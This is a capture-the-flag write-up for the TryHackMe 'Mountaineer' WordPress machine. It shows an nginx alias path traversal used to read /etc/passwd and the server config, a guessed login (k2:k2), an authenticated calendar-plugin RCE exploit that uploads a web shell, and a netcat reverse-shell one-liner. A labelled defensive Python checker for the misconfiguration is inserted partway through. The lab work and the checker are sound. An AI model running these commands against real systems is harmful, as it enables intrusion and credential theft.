Mountaineer (WordPress)

Directory Traversal (also known as Path Traversal).

┌──(docker㉿docker)-[~/Tryhackme]
└─$ curl "http://mountaineer.thm/wordpress/images../etc/passwd" -s -q | grep 'sh$'

root:x:0:0:root:/root:/bin/bash
vagrant:x:1000:1000:vagrant:/home/vagrant:/bin/bash
manaslu:x:1002:1002::/home/manaslu:/bin/bash
annapurna:x:1003:1003::/home/annapurna:/bin/bash
makalu:x:1004:1004::/home/makalu:/bin/bash
kangchenjunga:x:1006:1006::/home/kangchenjunga:/bin/bash
everest:x:1010:1010::/home/everest:/bin/bash
lhotse:x:1011:1011::/home/lhotse:/bin/bash
nanga:x:1012:1012::/home/nanga:/bin/bash
k2:x:1013:1013::/home/k2:/bin/bash

Initial foothold

Taking advantage of this vulnerability, we leak the nginx configuration files and discover where the vulnerability lies, along with something else of interest: a subdomain.

┌──(docker㉿docker)-[~/Tryhackme]
└─$ curl http://mountaineer.thm/wordpress/images../etc/nginx/sites-available/default -s -q
##
# You should look at the following URL's in order to grasp a solid understanding
# of Nginx configuration files in order to fully unleash the power of Nginx.
# https://www.nginx.com/resources/wiki/start/
# https://www.nginx.com/resources/wiki/start/topics/tutorials/config_pitfalls/
# https://wiki.debian.org/Nginx/DirectoryStructure
#
# In most cases, administrators will remove this file from sites-enabled/ and
# leave it as reference inside of sites-available where it will continue to be
# updated by the nginx packaging team.
#
# This file will automatically load configuration files provided by other
# applications, such as Drupal or Wordpress. These applications will be made
# available underneath a path with that package name, such as /drupal8.
#
# Please see /usr/share/doc/nginx-doc/examples/ for more detailed examples.
##

# Default server configuration
#
server {
        listen 80 default_server;
        listen [::]:80 default_server;
        server_name mountaineer.thm adminroundcubemail.mountaineer.thm;
        client_max_body_size 20M;
        # SSL configuration
        #
        # listen 443 ssl default_server;
        # listen [::]:443 ssl default_server;
        #
        # Note: You should disable gzip for SSL traffic.
        # See: https://bugs.debian.org/773332
        #
        # Read up on ssl_ciphers to ensure a secure configuration.
        # See: https://bugs.debian.org/765782
        #
        # Self signed certs generated by the ssl-cert package
        # Don't use them in a production server!
        #
        # include snippets/snakeoil.conf;

        root /var/www/html;

        # Add index.php to the list if you are using PHP
        index index.php index.html index.htm index.nginx-debian.html;

        server_name _;

        location / {
                # First attempt to serve request as file, then
                # as directory, then fall back to displaying a 404.
                # try_files $uri $uri/ =404;
                try_files $uri $uri/ /index.php?$args;
        }

        # pass PHP scripts to FastCGI server
        #
        location ~ \.php$ {
               include snippets/fastcgi-php.conf;
        #
        #       # With php-fpm (or other unix sockets):
               fastcgi_pass unix:/run/php/php8.1-fpm.sock;
        #       # With php-cgi (or other tcp sockets):
        #       fastcgi_pass 127.0.0.1:9000;
        }

        location /wordpress/images {
            alias /media/;
        }

        # deny access to .htaccess files, if Apache's document root
        # concurs with nginx's one
        #
        #location ~ /\.ht {
        #       deny all;
        #}
}


# Virtual Host configuration for example.com
#
# You can move that to a different file under sites-available/ and symlink that
# to sites-enabled/ to enable it.
#
#server {
#       listen 80;
#       listen [::]:80;
#
#       server_name example.com;
#
#       root /var/www/example.com;
#       index index.html;
#
#       location / {
#               try_files $uri $uri/ =404;
#       }
#}
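
The leaked config explains the traversal: `location /wordpress/images` has no trailing slash while `alias /media/` does, so nginx substitutes the matched prefix and turns `/wordpress/images../etc/passwd` into `/media/../etc/passwd`. The following Python is an added example, not part of this write-up or of nginx: a small checker that scans a config for that location/alias pattern and emulates the prefix substitution to show which request paths leave the aliased directory. The config text is constructed from the leaked block plus a corrected variant; the function names are ours.

```python
"""Detect the nginx "alias traversal" (off-by-slash) misconfiguration.

Added example, not part of the original write-up or of nginx itself.
A prefix `location` without a trailing slash combined with an `alias`
that ends in one lets a request for `/prefix../x` map to `<alias>/../x`,
which escapes the aliased directory.
"""
import posixpath
import re
from typing import Dict, List, Optional

# Constructed sample: the vulnerable block from the leaked config next to a
# corrected variant (the fixed block and the comments are ours).
SAMPLE_CONFIG = """
server {
    listen 80 default_server;
    root /var/www/html;

    # vulnerable: location has no trailing slash, alias does
    location /wordpress/images {
        alias /media/;
    }

    # corrected: location and alias both end in "/"
    location /wordpress/images-fixed/ {
        alias /media/;
    }
}
"""

# Matches `location [modifier] <path> { ... }` for non-nested location blocks.
LOCATION_RE = re.compile(
    r"location\s+(?:(=|~\*?|\^~)\s+)?(\S+)\s*\{([^}]*)\}", re.S)
ALIAS_RE = re.compile(r"\balias\s+(\S+?)\s*;")


def find_alias_traversal(config: str) -> List[Dict[str, str]]:
    """Return one finding per prefix `location` that is open to alias traversal."""
    config = re.sub(r"#[^\n]*", "", config)  # drop comments before matching
    findings = []
    for match in LOCATION_RE.finditer(config):
        modifier, prefix, body = match.groups()
        alias = ALIAS_RE.search(body)
        # Exact (=) and regex (~, ~*) locations do not do prefix substitution.
        if alias is None or modifier in ("=", "~", "~*"):
            continue
        alias_path = alias.group(1)
        if not prefix.endswith("/") and alias_path.endswith("/"):
            findings.append({
                "location": prefix,
                "alias": alias_path,
                "fix": f"location {prefix}/ {{ alias {alias_path}; }}",
            })
    return findings


def map_request_path(location: str, alias: str, uri: str) -> Optional[str]:
    """Emulate nginx's alias substitution for a prefix location.

    nginx normalises dot segments in the URI before matching, so
    `/wordpress/images/../etc/passwd` never reaches this location, while
    `/wordpress/images../etc/passwd` does ("images.." is a single segment).
    Returns the normalised filesystem path nginx would open, or None when the
    URI does not start with the location prefix.
    """
    norm = posixpath.normpath(uri)
    if uri.endswith("/") and not norm.endswith("/"):
        norm += "/"  # normpath drops a trailing slash; keep it for matching
    if not norm.startswith(location):
        return None
    return posixpath.normpath(alias + norm[len(location):])


def escapes_alias(location: str, alias: str, uri: str) -> bool:
    """True when the request resolves to a path outside the aliased directory."""
    target = map_request_path(location, alias, uri)
    base = posixpath.normpath(alias)
    if target is None:
        return False
    return not (target == base or target.startswith(base + "/"))


if __name__ == "__main__":
    for finding in find_alias_traversal(SAMPLE_CONFIG):
        print(f"[!] alias traversal in location {finding['location']} "
              f"(alias {finding['alias']}); suggested: {finding['fix']}")
    probe = "/wordpress/images../etc/passwd"
    print(probe, "->", map_request_path("/wordpress/images", "/media/", probe),
          "escapes:", escapes_alias("/wordpress/images", "/media/", probe))
```

The fix is the one the checker suggests: give the `location` the same trailing slash as the `alias` (or serve the directory with `root` instead of `alias`), after which `/wordpress/images../...` no longer matches the location at all and falls through to the normal handler.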
We access the new subdomain.

After trying a couple of weak passwords for the usernames we discovered, we log in successfully with k2:k2.

First, by checking the email titled "To my favorite mountain out there" in our inbox, we obtain a password.

Once inside WordPress we use the Modern Events Calendar Lite RCE exploit (exploit.py).

When running it:

┌──(docker㉿docker)-[~/Tryhackme]
└─$ python3 exploit.py -T 10.10.148.234 -P 80 -U /wordpress/ -u K2 -p th3_tall3st_password_in_th3_world
  ______     _______     ____   ___ ____  _      ____  _  _   _ _  _  ____  
 / ___\ \   / / ____|   |___ \ / _ \___ \/ |    |___ \| || | / | || || ___| 
| |    \ \ / /|  _| _____ __) | | | |__) | |_____ __) | || |_| | || ||___ \ 
| |___  \ V / | |__|_____/ __/| |_| / __/| |_____/ __/|__   _| |__   _|__) |
 \____|  \_/  |_____|   |_____|\___/_____|_|    |_____|  |_| |_|  |_||____/ 
[+] Authentication successfull !

[+] Shell Uploaded to: http://10.10.148.234:80/wordpress//wp-content/uploads/shell.php

We open shell.php.

To get the shell back to our machine we use the command:

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.9.0.60 443 >/tmp/f

And on the listener:

┌──(docker㉿docker)-[~/Tryhackme]
└─$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.9.0.60] from (UNKNOWN) [10.10.148.234] 52422
/bin/sh: 0: can't access tty; job control turned off
$ ls
annapurna
everest
k2
kangchenjunga
lhotse
makalu
manaslu
nanga
vagrant
$ 
